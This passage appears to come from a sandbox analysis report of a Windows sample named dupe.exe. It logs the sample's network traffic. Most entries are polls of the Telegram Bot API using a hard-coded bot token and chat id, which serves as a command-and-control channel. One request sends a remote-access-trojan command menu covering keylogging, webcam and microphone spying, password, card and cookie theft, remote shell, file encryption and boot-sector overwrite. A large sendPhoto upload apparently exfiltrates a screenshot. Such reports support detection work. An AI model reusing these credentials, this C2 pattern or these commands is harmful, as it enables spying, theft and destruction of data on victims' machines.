      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:53 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:54 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:55 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:56 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:12 GMT
      Content-Type: application/json
      Content-Length: 416
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%E2%9B%94%20Argument%20%3Cur%3E%20is%20required%20for%20/OpenURL
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%E2%9B%94%20Argument%20%3Cur%3E%20is%20required%20for%20/OpenURL HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:12 GMT
      Content-Type: application/json
      Content-Length: 382
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:37 GMT
      Content-Type: application/json
      Content-Length: 416
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:49 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:50 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:51 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:52 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:53 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:54 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:55 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:56 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:57 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:58 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:21:00 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:21:01 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      220.167.154.149.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      220.167.154.149.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      209.205.72.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      209.205.72.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      157.123.68.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      157.123.68.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-nl
      POST
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      POST /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319 HTTP/1.1
      Content-Type: multipart/form-data; boundary="6d84e473-bc5f-441c-be87-e8f74faafc79"
      Host: api.telegram.org
      Content-Length: 425007
      Expect: 100-continue
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:40 GMT
      Content-Type: application/json
      Content-Length: 984
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      73.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.144.22.2.in-addr.arpa
      IN PTR
      Response
      73.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-73deploystaticakamaitechnologiescom
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 13.107.21.237:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      tls, http2
      2.0kB
      9.3kB
      21
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=

      HTTP Response

      204
    • 149.154.167.220:443
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356
      tls, http
      dupe.exe
      23.1kB
      53.4kB
      178
      108

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%F0%9F%8D%80%20Bot%20connected

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=1

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=2

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=3

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=4

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=5

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=6

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector
%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628332

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628333

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%E2%9B%94%20Argument%20%3Cur%3E%20is%20required%20for%20/OpenURL

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351

